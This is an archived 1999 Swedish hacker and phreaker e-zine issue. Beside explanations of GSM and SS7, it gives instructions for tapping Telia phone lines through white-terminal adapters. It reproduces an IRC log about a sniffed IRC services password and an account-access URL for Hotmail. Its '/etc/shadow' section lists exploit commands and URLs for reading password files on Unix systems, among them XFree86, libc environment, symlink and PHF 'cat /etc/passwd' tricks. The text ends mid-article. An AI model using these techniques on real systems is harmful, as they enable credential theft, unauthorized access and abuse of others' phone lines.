OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Heretics Inc. tar o presenterar.... [ Outlaw Informativa ] issue 7, 99-09-08 ___________________ O U T L A W 7 September 7, 1999 ___________________ - A Heretics Inc. Production - "Those who desire to give up freedom in order to gain security, will not have, nor do they deserve, either one". -Thomas Jefferson Nu ska jag (EDITOR) aka BLÄÄ skriva en liten intro och lite annat skit som vi alltid brukar göra. Tja, nu är det regnigt och skitigt...det är såna dag- ar man sitter och myser framför närmsta lilla Utvecklings miljö *mysa* Nu vill jag uppmana alla att inte klaga på stackars crazy-train, han har så inni helvete inte rippat nåt i artikeln om GSM.......jaja, Jag tror fan jag tar och skiter i artikeln om Mellanförstärkare som jag snackade om i förra numret. Jag kan för lite om dom och verkar ganska ointressanta. Hmm, just fan...va gillade ni min GSM security artikel? c0l4..nää, det e lugnt du behöver inte klaga på den; jag vet vad du tycker om allt jag gör, så är det ju när man är FJÅRTIS !!..men kom ihåg 14 är en ålder och inte lixom en stil eller typ av blod..ähh, skit samma. Jag har varit ute med Segelbåten också, 1 vecka dess verre..men de va skönt som fan men man längtade hem till datorn och lukten av gata. Nu ut och haxxa VMS burkar nu. Jag är inte elajt jag är bara 0nd och står för mitt citat 0ndska är Kärlek. Lite annat shit också, o-i var ju förut men nu är det en blandning av seriöst och humor/ironi. C:\> type C:\WINDOWS\SYS.LOG Begin of Microsoft(C)(R)osv..osv..osv.., System LOG Nope, no fraud on your .comp today just Bill Gates looking at funny porn pics. C:\> Min humor är så dålig att den är bra, det är det som är poängen, snorrrk. ----------------------------------------------------------------------------- Disclaimer ----------------------------------------------------------------------------- All denna skitiga information är bara till för utbildningssyfte och sånt tjafs. Så du får fan ta ansvar för dina egna handlingar om du skulle hamna i bur pågrund av utföringar av informationen som man faktiskt kan läsa här. Kiss och Bajs ålder på oss som gömmer sig bakom en Disclaimer, det är ju alltid bra att ha en...paranoid aka diox1de. ----------------------------------------------------------------------------- Medverkande ----------------------------------------------------------------------------- Jo fan såklart man måste ha en lista på alla som är med och skriver till just detta issue. ÄHHH...här är den ! Alias: diox1de Contact: keytrace@usa.net ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Alias: dthl Contact: #Phreakerz@DALnet ¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Alias: ncode Contact: #swehack@DALnet ¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Alias: crazy-train Contact: #Phreakerz@DALnet ¯¯¯¯¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ----------------------------------------------------------------------------- w w w . i n t e u p p e ä n . c o m I N N E H Å L L S F Ö R L E K N I N G ¤ Staff 1:1 . Editor 1:2 . Disclaimer 1:3 . Medverkande 1:4 . Innehållsförlekning 1:5 . Aktuellt 1:6 . Outlaw Informativa söker skribenter ¤ Phreaking och Phelefoni 2:1 . Säkerhet i GSM systemet, del #2 av: diox1de 2:2 . GSM telefonen och dess funktion av: crazy-train 2:3 . SS7 - Den magiska signalen av: diox1de 2:3 . Adapter för vita terminaler av: dthl 2:4 . Polisen tvingar telebolagen, arghh av: diox1de ¤ Hacking, Networking och Unix 3:1 . msg'a kanalen du är bannad på av: diox1de 3:2 . Vem som helst kan läsa din Hotmejl av: diox1de 3:3 . 0ldschool Hacking: /etc/shadow av: diox1de 3:4 . Linux Säkerhet Administration av: diox1de 3.5 . Cisco kommando lista av: ncode 3:6 . Ethernet kort till Windows CE av: diox1de 3:7 . Svenska hackers hackade NASA, busted ! av: diox1de ¤ Bomber (Hjälp!) 4.1 . Svin lätt & rolig Bomb av: dthl ¤ Snusk och slut på numret 5:1 . Copyright 5:2 . 3x1t3d(), eller nåt ----------------------------------------------------------------------------- Aktuellt ----------------------------------------------------------------------------- ¤ Knash's nick övertaget Knash fick reda på att hans nick blev övertaget runt midnatt den 31 august- i. Den lilla fjårtis till lamer sig sig ha sniffat nickserv med ett elajt h4xx0r program som han med självklarhet inte alls skrivit själv. Eftersom nickserv skickar ident requests som är i form av kommandon i klartext så är det fullt möjligt att sniffa nickserv. Knash har bytte nick temporärt till dcrypt men har nu ett fast nick (diox1de) nuvarande diox1de snackade med lamern som säger att hans orginala nick är [f]LASH, men inget är klargjort än. $ log beginning knash^ (fIKUS@z2-1-76.sbbs2.net) <knash^> jaha <knash^> hejhej <knash^> :) <Dcrypt> vem e du ? <knash^> åke <knash^> å du ä knash <knash^> dum du ä å ger bort ditt pass <Dcrypt> det har jag inte gjrot <Dcrypt> gjort even <knash^> j <knash^> o <Dcrypt> hmm..skicka log <knash^> jag ä ivil haxxor å snodde ditt nick <knash^> :) <Dcrypt> å så ivil du är, varför gjorde du det då? <knash^> [Knash^(me@t3o29p13.telia.com)] identify secretcpp <knash^> :) <Dcrypt> sniffade du eller ? <knash^> yeye... whatevah :) <knash^> tycker att ni på #swehack ska sluta snacka om att ni ä så elit hela tiden å göra nåt åt saken <Dcrypt> hehe, jag har inte sagt att jag e l33t.. <knash^> tsss <knash^> men du får inte tebax ditt nick iaf :) <knash^> om jag får ett shell så fåru det <knash^> :) <Dcrypt> jag har inge shel <Dcrypt> shell <knash^> fixa då <knash^> :) <Dcrypt> ähh. <knash^> jo <Dcrypt> nej...Är du så lam så att du tar över nåns nick och utpressar per- sonen så kan du lika gärna behålla det <knash^> haha <knash^> lam? <knash^> vill ha mer shells juh! <Dcrypt> då är det inte din dag i dag <knash^> mohaha <knash^> tar över nåns nick? det va juh du som gav det till mej <Dcrypt> ja visst du <Dcrypt> skicka loggen da <knash^> har redan visat dej <Dcrypt> bytt passwd har du gjort också, ännu mer elajt <knash^> javet <knash^> annars kan juh du ta tebax det :) <Dcrypt> inte mot nåt shell iasfs <knash^> tss <knash^> haru nåt att trada då? <knash^> ftp? <Dcrypt> nepp, du får inget av mig iafs <knash^> haha <knash^> oOOoOo <knash^> nuker <Dcrypt> snacka inte skit om dig själv <knash^> haha <knash^> lamer <Dcrypt> Har du kul ? <knash^> ja <knash^> :) <knash^> bara så du vet så ä jag [f]LASH å fLAERP å jag sniffade nickserv så jag har på alla som identifyade då <knash^> :) <Dcrypt> k, den där [f]LASH verkar inte kunna ett skit <knash^> hehe <knash^> ne javet <knash^> han ä jätte lam <knash^> ojoj <knash^> d ä JAG dsom ä [f]LASH din nolla å jag ä mer elit än du nånsin kommer bli <knash^> :) <Dcrypt> Du fattar inget, klart jag vet att flash e du.. <knash^> lamer du ä <knash^> sluta snacka i gåtor då <Dcrypt> eftersom du är så jävla l33t så borde du fatta hur man snackar. <Dcrypt> Säg nåt du kan <knash^> typ en massa.. lite c.. lite linux.. massa win :).. ganska lam men ändå mer leet än du <Dcrypt> skulle inte tro det <Dcrypt> win är inget att kunna <Dcrypt> Jag lovar du vet inte ens vad Public/Private key andvänds till <Dcrypt> Jaja, bestäm själv..ge mig tillbaka nicket eller behåll det <knash^> behåller <Dcrypt> Jag lovar du vet inte ens vad Public/Private key andvänds till <Dcrypt> Din fula lamer <knash^> hihi <Dcrypt> Jag lovar du vet inte ens vad Public/Private key andvänds till <Dcrypt> ! Som ni ser så visste inte den som kallar sig [f]LASH (muwahah, lamt nick) vad Public/Private key andvänds till. ----------------------------------------------------------------------------- Outlaw Informativa söker skribenter ----------------------------------------------------------------------------- Outlaw Informativa eller gruppen söker medlemmar som har hyffsad kunskap och inte har nåt emot att skriva. Man ska ha fler kunskaper än Phreaking, vi vill inte ha en massa lajta beige-boxers här. Outlaw Informativa har aldrig skriv- it om hur man bygger en LMHS och kommer aldrig att göra. Bra att kunna om du vill bli med: Hacking (Nätverk, Bakdörrar etc) Unix (hur det funkar, säkerhet, nätverk) Phreaking (Växlar, signalsystem etc) Programmering (t.ex. Assembler, C/C++, Java osv) Kryptering (Nyckelhantering, algoritm strukturer osv) Detta är absolut inga krav, men har du kunskaper kring detta är det stor chans att du kan bli en av oss ;)..Så länge du har nåt att skriva om och vet ditt syfte till att skriva och ger ut bra information sånt som folk läser och inte kastar bort. Maila keytrace@usa.net om du vill bli 0n3 0f us =) ----------------------------------------------------------------------------- Säkerhet i GSM systemet, del #2 ----------------------------------------------------------------------------- [Inledning] I första delen om GSM säkerhet skrev jag om hjärtat "Subscriber Identity Aut- hentication, hur det funkade teoretiskt och vilka algoritmer som andvändes till vad. För att läsa den här delen behöver du lite förståelse för olika element i kryptering, men jag kommer hjälpa till lite endå :P [A5 i teorin] A5 som ni kanske inte kommer ihåg (om inte, kolla Outlaw-06) krypterar tal mellan 2 mobilphelefoner med nyckeln Ki, mkt mer behöver du inte fatta om du vill ha en mer omfattande förklaring så läs outlaw-06, uhmm...damn jag står och tjatar om outlaw-06 hela tiden...denna artikel är ju baserad på att man läst Del #1. Observera att det här är delvis rippat eftersom jag själv inte fattar riktigt allt, men texten är ju skriven för er :) Jo föressten det är 10% rippat så att ni inte tror att jag rippat 90% av den, beheeh. A5 är ett "streamcipher" som skapas av tre LSFR (Linear Feedback Shift Regi- ster) av graderna 19, 22 och 23. Newbie note: Ett streamcipher är teknik vid kryptering, den krypterar en bit i taget med hjälp av en keystream. Klockkontrollen är en slags tröskel funktion av de mittersa bitarna i de tre olika skift-registren. Summan av graderna för skift-registren 64 (19+22+23) och då andvänds alltså en 64-bits "session key" för att initiera regstren. Newbie note: Session Key är en symmetrisk nyckel och det innebär att den andvänds både vid kryptering och dekryptering. Sen matas det 22-bitars ramnumret in i TDMA registret. För varje TDMA skapas två 114-bitars keystreams sedan gör en XOR på Downlink och Uplink (Trafiksignaler) Newbie note: 890 och 915 MHz används för Uplink och 935 och 960 MHz för downlink. Uplink menas kommunikationen mellan phelefon till ba- sstation medans Downlink används för kommunikation i motsatt riktning. Säkerheten i detta beror på hur cepe man är. Har man inte tillräcklig längd på nyckeln och hur passa bra "keystreams" är och hur slumässigt generard den är. Lite info här kanske är lite lik "Att förstå Telekommunikation" och det kan- ske beror på att jag fått infon där ifrån. [Slutord] Mer om GSM Säkerhet kommer i Outlaw Informativa, issue #8 där jag hade tänkt att ta upp mer om olika egenskaper i GSM systemt. ----------------------------------------------------------------------------- GSM telefonen och dess funktion ----------------------------------------------------------------------------- En GSM-telefon kan beskrivas med ett blockschema. Här kommer detta och det beskriver en GSM-telefon's sändare och mottagare. _______ | GSM | |Telefon| |_______| _____/ \_____ / \ _______________|___ _____|________________ 270 kbit/s --> [Moduleringssänadare]-------------[Mottagare/demodulering] ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ ____________|___ _____|___ 33,8kbit/s --> [Skur-formatering]-------------[Utjämnare] ¯¯¯¯¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯ ______|___ _____|______ [Kryptering]-------------[Dekryptering] ¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯ ________|___ _____|________ [Interleaving]-------------[Deinterleaving] ¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯¯¯ 456bitar/20 ms --> ________|___ _____|_ 22,8 kbit/s [Kanaldekoder]-------------[Decoder] ¯¯¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯ 260bitar/20 ms --> ______|___ _____|______ 13 kbit/s [Talkodning]-------------[Talavkodning] ¯¯¯¯¯¯|¯¯¯ ¯¯¯¯¯|¯¯¯¯¯¯ 160 samples * 8 bitar/20ms --> ____|___ _|_ [Segmentering] [D/A] ¯¯¯¯¯¯¯¯|¯¯¯ ¯|¯ 8000 samples/s * 8 bitar --> _|_ _____|___ [A/D] [Högtalare] ¯|¯ ¯¯¯¯¯¯¯¯¯ ____|___ [Mikrofon] ¯¯¯¯¯¯¯¯ Här nedanför kommer jag bara ta upp de mest intressantaste bitarna av blocks- chemat. Talkodningen- Bithastigeten 64kbit/s för talöverföringen är en alldeles för stor informati- onsmängd för tt effektivt uttnyttjande av nätet. Man inför talkodning vilket innebär att man skapar en kopia av det mänskliga talorganet. Vårat talorgan arbetar relativt långsamt och man kan utan alltför stor avvikelse från verkligheten räkna med att det inte ändrar karaktär mer än ar 20 ms. Talet analyseras under 20 ms. Med hjälp av motsvarande utrustning i mottagaren omvandlas signalen till ett s k syntetiskt eller konstgjort tal. På detta sätt kan överföringshastigheten minskas till 13 kbit/s. Talkodningen är konstruerad för talsignaler och är inte lämplig för överföring av andra signaler, t ex rena datasignaler från datorer och faxar som är anslutna till mobiltelefonen. Dessa ansluts via ett särskilt modem. Och signalerna passerar inte denna talkodaren som kortar ner överföringshast- igheten, utan man kan köra på i c:a 64kbit/s. Kanalkodningen- Kanalkodningen innebär att man kan upptäcka och korrigera fel i den mottagna bit-signalen. Det finns då ytterligare bitar tillgängliga, som används som kontrollbitar eller checkbitar. Dessa bitar ger mottagaren möjlighet att korrigera fel som uppstått, t ex på grund av störningar i överföringen. Interleavingen- Interleaving är en metod att ytterligare minska felen i överföringen. Kanalk- odningen rättar kortvariga fel, fel i enstaka bitar Med interleaving kan mera "långvariga" fel korrigeras, dvs interleavingen motverkar att flera bitar följande varandra försvinner. Detta sker genom att den digitaliserade signalens bitar inte sänds i logsk följd utan bitarna i ett 20 ms-block sänds iväg i en annan följd, vilket gör att inte nånting stämmer. Kryptering/Formatering- Kryperingen ska fungera så att det ska vara "omöjligt" för utomstående att avlyssna samtalet. I mobiltelefonens processor finns en krypteringsnyckel lagrad. Var gång telefonen försöker registrera en ny postition eller koppla upp ett samtal, kontrolleras abonnentens identitet. Från MSC skickas ett slu- mptal till telefonen. Med hjälp av en algoritm som tillhör nyckeln beräknas ett svar, som telefonerna skickar tillbaka till MSC och vidare till VLR som kontrollerar att svaret är korrekt. Om svaret inte är korrekt, så finns abonnemanget hos någon annan operatör eller är av någon anledning inte längre giltigt. När data sänds, krypteras dessa i telefonen med hjälp av den "inbyggda" nyckeln och det översända slumptalet. Den krypterade signalen tas emot av nätet, som omkyrpterar signalen så att den passar till mottagarens nyckel och det slumptal som översänts till denna. Om allt är korrekt sker en dechifferi- ng i mottagartelefonen. Efter att meddelandet krypterats i sändartelefonen, sker något som kallas för skur-formatering. Det betyder att informationen på läpmligt sätt kombineras med information om den kanal som kommer att användas för sändningen. Efter dessa ingrepp ligger datahastigheten på c:a 33,8 kbit/s. Nu än sålänge har vi gått igenom det mest intressanta steg-för-steg i vad som egenligen händer i din lilla nalle :) Nu ska jag gå in lite djupare in på ämnet "Modulering/sändning": Mobiltelefonen arbetar på frekvensområdet 900 MHz. Det aktuella frekvensområ- det ligger mellan 890 och 915 MHz vid sändning och 935 och 960 MHz vid mottagning. Frekvenskillnaden mellan den s k bärvågen vid sändning respektive mottagning är 45 MHz. Avståndet mellan två kanaler ska vara 200 kHz. I vardera sändningsriktningen finns därför totalt 124 kanaler att dela på. På grund av att flera delar på dessa. 124 kanaler, har varje GSM-operatör i Sverige 4,8 MHz, dvs 24 kanaler till förfogande för sin egna trafik. Bärvågen, t ex 900 MHz, är en sinusformad signal som alstras på sändaren. Den informationen som ska överföras, får på något sätt förändra bärvågen från sändaren. Detta kan ske genom att amplituden, frekvens eller fasläget påverk- as. Detta kallas för modulering som ni kanske vet :) GSM använder en typ av fasmodulering. Bärvågen innehåller alltså en avikelse från den ursprungliga sinuskurvan som motsvarar våran krypterade information. Nu gäller det att utnyttja de 24 kanaler så effektivt som möjligt. Genom att utnyttja en typ av timesharing kan 8 förbindelser etableras per kanal. Man kan säga att varje sändningsperiod delas upp i 8 intervall och i ett sådant placeras vår formaterade skur av krypterad information. Efter moduleringen är datahastigheten 270 kbit/s Räckvidden är begränsad för en basstation och en telefon är maximalt något tiotal km vid frekvenser av 900 MHz, kan samma användas av flera basstationer utan att detta stör överföringen. Det gäller endast att fördela kanalerna mellan basstatuinerna på ett intelligent sätt. Varje basstation täcker en cell. Ett antal celler bildar tillsammans ett cluser och tillgängliga kanaler fördelas på dessa celler. Detta innebär att samma kanal används för övering av många samtal, och det är inte alls säkert att sändande telefon och mottagande telefon använder samma kanal. Det viktiga är att de akuella uppkopplingarna finns så långt ifrån varandra att de inte stör varandra. Det innebär också att när du lämnar en cell, kan du, naturlig- tvis automatiskt, kopplas om till en annan kanal under pågående samtal. Aktuellt MSC sköter om kanalvalet. Nätet- Nu säger vi att din krypterade signal kommit ut på nätet. I det fasta telenä- tet är överföringskapaciteten nästan obegränsad. Här förs den vidare till den operatörs nät som den abonnent du anropat är ansluten till. Sedan förs den vidare till den MSC som din talmottagare är uppkopplad till. Anpassningen är kryptering sker till mottagarens kodnyckel och algoritm. Ok nu har vi gått igenom sändnings-delen. I nästa nummer av Outlaw Informativa ska jag skriva lite om mottagardelen, vilket är lite mindre komplicerat.Ok nu skriver jag in vad alla förkortningar jag använt betyder. GSM = Global System for Mobile Communications, eller på svenska : globalt mobil-kommunikationssystem. NMT = Nordic Mobile Telephone System (analogt system, omtalat i 900 MHz frekvensen om ni inte visste detta) MSC = Mobile Switching System VLR = Visitor Location Register = "besökregister". ----------------------------------------------------------------------------- [Grundläggande] SS7 - Den magiska signalen ----------------------------------------------------------------------------- Innhåll: ¯¯¯¯¯¯¯¯ --> Inledning --> in-band/out-band signalering --> Associerad signalering --> Olika funktions element i SS7 [Inledning] SS7 är ett ett Digitalt Signallerings Nätverk som avänds för att koppla och hantera kommunikationen på de allmäna telenätet, det kallas "Smart Network" och menas att det har inbyggda funktioner i själva nätverket. SS7 är uppdelat i olika delar och varje har sin egen funktion att hantera. Eftersom SS7 är digitalt kan man andvända den till andra saker t.ex. D-kanalen för ISDN. SS7 har också möjligheter att kunna överföra multimedia som bild, ljud och data. Teletrafik och Datatrafik sänds över olika kanaler eftersom det är olika krav på utrustning, datatrafik kräver grymmt mycket högre bandbredd än teletrafik. SS7 = Signalling Systems 7 [in-band/out-band signalering] Från början va SS7 ett "multi frequency in-band- telephony signalling system" men har nu ersatts med "common channel out-of-band signalling system" Från början va det tänkt att SS7 bara skulle förnya den gamla tekniken att koppla upp och hantera teletrafik men har nu fått andra andvändningsmöjlighe- r, SS7 kan t.ex. transportera ISDN signaler som andvänds vid Internet-Kommun- ikation. För att du ska förstå vad in-band och out-band signalling är måste det finnas en enkelt förklaring och jag hoppar inte över nåt. In-band signal- ling är när ALL information går genom samma. Out-band signalling är lite annorlunda. Out-band signallning etablerar en separat digital kanal för växling av signal information. Denna kanal kallas för "Signal Länk". Signal Länkarna är till för att hantera all nödvändig information i signalering mellan olika noder. Så, vad är det som är så bra med out-band signalering då? --> out-band signalling tillåter transport med högre hastigheter med mer data. 56kbps kan hantera data så grymt mycket snabbare en "Multi Frequency Outpulsing" --> out-band tillåter att starta signalering när som helst och var som helst. --> out-band gör det möjligt att signalera till olika funktioner i nätverk- et där det inte är nån "Direct Trunk Connection". [Associerad signalering] En typ av associerad signalering ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ |¯¯¯¯¯¯¯¯|***************************|¯¯¯¯¯¯¯¯| | |¯¯¯¯| |***************************| |¯¯¯¯| | | |Växel |***************************| |Växel | (Ful ASCII, by diox1de(C) | | #1 | |***************************| | #2 | | | | | |***************************| | | | | |____| |---------------------------| |____| | | | | | ¯¯¯¯¯¯¯¯ * = "Voice Trunk" ¯¯¯¯¯¯¯¯ - = "Signalling Link" Associerad signalering funkar bra så länge växeln bara kraven för signalerin- gen är mellan sig själv och andra växlar. "The North America implementers" ville designa ett SS7 nätverk som gjorde det möjligt att vilken "node" som helst skulle kunna växla signaler med vilken övrig SS7 kabel node" som helst. Fast Associerad Signalering blir mycket mer kompilcerat när man ska växla signaler mellan olika "noder" som inte har någon fast anslutning. [Olika funktions element i SS7] SSP : Service Switching Points Är en telefon-växel med inbyggd mjukvara för Signallings Systems 7 och Hanterar uppkopplingar och addressering av anrop. Kan också andvändas för att ställa frågor till en Central databas (SCP) om vilken väg en förbindelse ska kopplas upp vid. SSP är själva porten till SS7 näte- t. STP : Signal Transfer Points Hanterar nätverkstrafiken mellan olika signalerpunkter. STP kollar information i SS7 paketen för att veta var den ska vidarbefoga paketet. Detta kan vara en liknelse hur en HUB arbetar. En signalpunkt andvänder en "Routing table" för att veta var paketet ska någon stanns. SCP : Service Control Points Är en typ av databas som kan kolla information och verifiera t.ex. kreditkort. [Efterord] Hoppas du fattade nåt iafs..och sen får jag inte glömma källa satt inga idio- ter får för sig att jag rippar =) Jag gjorde det väldigt grundläggande nu, faktiskt så började jag skriva avan- cerat hur nätet fungerade och vilket element som kommunicerade med vilket men eftersom jag inte alls lyckades med att göra en tydlig ascci bild så blev det inget av det, om du skickar nåt liten dos program till mig som kollar alla pixlar och sånt och formar om en bild till ascii så kan jag nog ta mig i kragen och skriva en avancerad del. Maybe be to continued... Källa: --> Att första Telekommunikation --> Illumient, Signalling Systems 7. ----------------------------------------------------------------------------- Adapter för vita terminaler ----------------------------------------------------------------------------- Ok, nu börjar vi då. Den vita terminalen är en förnyad version av den "gamla" svarta terminalen med skruvar. Nuförtiden så byts en del gamla terminaler ut mot de nya, därför telia gör detta är att förhindra missbruk, fast det är ju lätt att gå igenom det ändå. I bland så sitter det adapters på vit terminale- n, ( adaptern gör beige-boxing från vita lätt som en plätt ) jag tror att adaptern är till för linjemannens special lmhs, det brukar sitta en adapter på nästan alla vita terminaler, men sitter det ingen adapter där du ska beiga så är det bara att bryta upp en annan japp och ta lös adaptern och sätta den på den viting som du ska abusa. De flesta vet hur en vit terminal, om du inte vet det så kan du ta en titt på vsp's bildarkiv och vet du inte hur en adapter så kan du kolla på den hära fina ascii bilden: _______ _______ / | | \ | |_________________________________________| | | ___/ \___ | | | ____ _____ _____ _____ _____ _____ | | | |___ | | | | | | | | | | | | ___| | | \ |___| |___| |___| |___| |___| |___| / | | |__________________________________________| | | | | | \_______ ____/ Jag vet att denna bild inte säger så mycket men jag ska fota en sedan, fast här är lite mer fakta om adaptern, den är grå och på ovan sidan står det: A952 7569 8840. På varje adapter finns det 10 linjer ( som på vita och svarta terminaler ) och alltså 20 hål. Du löddar/binder fast nålar eller två små plåtbitar på beige linan och stoppar in två hål. Sådär ja! nu har du lärt dej hur man beigar från vitingar. // dThl [Knash fyller i: Finns på bild på adapter på: http://members.xoom.com/firecrew/pics/vit.jpg] ----------------------------------------------------------------------------- Polisen tvingar telebolagen, arghh ----------------------------------------------------------------------------- Farbror blå suger stock ! klart att det alltid finns en väg ut men nu ska snuten försämra för oss, dom tvingar Telebolagen att dom också ska kunna ha access till att avlyssna krypterade samtal och få fram klartext. Det ska alltså finnas en massa onödig hårdvara och program för att få encrypted till cleartext, uurk. På riksdagens fula bord ligger det redan ett fult lagförslag (proposition 1994/95:227) om ändring av rättegångsbalken) .....det börjar bli sorgligt nu. Jäjä, vi kan väl skaffa en algoritm som är omöjlig att forcera. Men hur lång tid kommer det ta ? ..och hur många fattar så mycket att de kan va med ? inte speciellt många, inte heller jag...Nu pallar inte jag mer arti- keln e slut kanske. ----------------------------------------------------------------------------- msg'a kanalen du är bannad på ----------------------------------------------------------------------------- Jag satt och plinkade på IRC och diskuterade på #Nuke.se hur allvarligt DoS egentligen är, nä....men de enda intressanta med DoS är hur det funkar... TCP/IP, UDP osv. är ju inte byggda för att kunna krasha andra hosts. Sen blev jag ju bannad såklart sen testade jag skriva /msg #nuke.se nuke l337s...jao och det funkade, vetta fan om det är inbyggt eller om det är en bug. Låt oss säga att det är en bug, mkt roligare så. Ja men vi synns på #2,000. Hmm, läg- ger till lite på artikeln efter som är märkt lite saker. Detta kallas för External Message och fungerar bara om kanalen har satt +n (No external Messa- ges) Sen blir man ju tvingad att tacka Bhunji som gav förslag på topicen, ville inte låta de se löjligt ut, BLÄÄÄ. ----------------------------------------------------------------------------- Vem som helst kan läsa din Hotmejl ----------------------------------------------------------------------------- Jo som vanligt så är ju Microsoft inga säkerhets experter. Ännu ett liten lucka i Hotmails system. Du kan läsa vem som helsts account och det är ju lamt men andvändbart, många miljoner andvänder hotmail och ofta skickas mail med passwds till ditt nya t.ex. X00M konto. Connecta bara till: http://207.82.250.251/cgi-bin/start?curmbox=ACTIVE&js=no&login=USERNAME&passwd=eh Med din favorit HTTP klient. Observera att USERNAME byts ut mot valfritt username ;) Detta funkade dock inte länge, redan fixat. Men så ni vet vad hålet va. Är d- et någon som tekniskt vet hur bakdörren funkade så kan ni skicka en jävel till mig på keytrace@usa.net. ----------------------------------------------------------------------------- 0ldschool Hacking: /etc/shadow ----------------------------------------------------------------------------- [Förord] ¯¯¯¯¯¯ Jag tänke förklara ett par gamla godingar, alltså olika tekniker för att kun- na rycka åt sig /etc/shadow. Jag vill inte ha en massa klagomål på denna artikel, den är ju inte direkt för avancerad och det är ju inte jag heller =) [XFREE86] ¯¯¯¯¯¯¯ Detta ska funka på de flesta *nix system som kör XFREE86 och utförs med: XF86_SVGA -config /etc/shadow Om det inte är Fredag den 13 och du inte har fått ditt dagliga rövknull av far din så ska /etc/shadow ge utdata på terminalen. [Hål i libc 5.4.7] ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Jao, i de flesta *nix systemen ska det också finnas ett "Security hole" i libc 5.4.7 som låter dig sätta resolv_hots_conf till vilken fil som helst. Om du kan köra ett SUID program som andvänder resolv_host_conf typ ping, tracer- oute, ssh, rlogin. Om du nu t.ex. andvänder ping så ska ping ge /etc/shadow som utdata på terminalen. 1. Skriv bash för att starta bash skalet. 2. Skriv export RESOLV_HOST_CONF=/etc/shadow 3. Skriv ett av fil namnen ovan med asdf, t.ex. ping asdf [Rycka /etc/shadow med dip] ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ En del Linux Slackware burkar kan du andvända dip för att exploita root, den kan också andvändas för att rycka åt sig /etc/shadow. ln -s /etc/shadow /tmp/buh.dip /sbin.dip -v /tmp/buh.dip [Gammalt .lastlogin trick] ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Sen finns det ett gammalt SCO och Sys V .lastlogin trick. Kolla så att .las- tlogin i ditt hem bibliotek så att den ägs av root eller auth rm -f ~rm -f ~/.lastlogin ln -s ~/.lastlogin /etc/passwd Logga nu ut och logga in igen så du kan skapa länken. cat .lastlogin > passwd rm -f ~/.lastlogin [ypcat på möglande Unix system] ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Sen kan du alltid testa ypcat /etc/passwd som kan funka på söndermöglade Unix system. [PHF är en historia] ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Egentligen tänke jag inte ta med PHF eftersom det är söndermöglad och att det inte finns nån server som har PHF hålet. Men det finns faktiskt gamla Asiatiska system där PHF fortfarnande funkar. http://www.target.com/cgi-bin/phf?Qalias=x%ffcat%20/etc/passwd eller kanske... http://www.target.com/cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd [Unshadow .c script] ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ Kan funka på en del *nix versioner som är gamla som gatan. #include <pwd.h> main() { struct passwd *p; while(p=getpwent()) printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd, p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); } Källa: shadow.txt Detta borde läsas av allas petiga typer! All information i artikeln är inte helt skrivet med egna ord. Så kom inte och klaga på att texten är likt de engelska orginalet. ----------------------------------------------------------------------------- Linux Säkerhet Administration ----------------------------------------------------------------------------- Jag är relativt ny på Linux och blev sugen att skriva lite om säkerhet när jag grubblade igenom axxezz's artikel i SuZ om Linux security. Så jag hade tänk förklara enkelt om säkerhet i olika dist o unix system i allmännhet. Jag kommer hålla mig till 2 vanliga dist, ulmhhh...Redhat och Slackware. För er som inte orkar lusa igenom allt för att veta vad artikeln innehåller så kan jag berätta det redan nu ;) ...Password Policy, Password Shadowing, TCP Wrappers, Anonymous FTP, 0nda services och Loggfiler. [Password Policy] Nej nu ska jag inte ta upp nåt jävla shit om hur man väljer rätt lösenord som varenda pc tidning på markaden skriver om eller har skrivit om, jag bryr mig inte om vilka som andvänder bra lösenord eller inte, det skapar bara för- delar för omgivninge. Men jag ska däremot ta upp hur man får systeme t att inte tillåta passwd under 8 tecken osv. Detta är dock mest andvändbart för admin på nån skola. Men det kan va kul att veta än då. I Slackware så öppnar du /etc/login.defs med en skön text-editor. De t första du ska kolla är om LOG_OK_LOGINS är satta på yes, sen kan du sätta ENABLE_MD5_CRYPT på yes (kryptering är ju bra i alla fall, om det inte är en fel programmerad förstörande algoritm :I) Om du vill kunna andvända passwd över 8 tecken så kan du ändra värderna på variblerna PASS_MAX_DAYS, PASS_MIN_DAYS, PASS_MIN_LEN och PASS_WARN_AGE till några lämpliga värden. I Redhat så öppnar du också /etc/login.defs och sätter variblerna PASS_MAX_DAYS, PASS_MIN_DAYS, PASS_MIN_LEN och PASS_WARN_AGE till det som känns rätt. Skilladen mellan konfigurationen i Slackware och Redhat är nästan ingen, configurationen om man vill andvända MD5 görs det i login.defs om man andvänder Slackware, det configueras vid installation i Redhat. MD5 är en one-way algoritm som menas att den aldrig kan dekrypteras, algoritmen är inte hemligt så det som behövs är att skriva ett program som krypterar från en ordlista och gämnför med de krypterade passwd:et i /etc/passwd eller i /etc/shadow som är en standardisering för nya Linux system, /etc/shadow 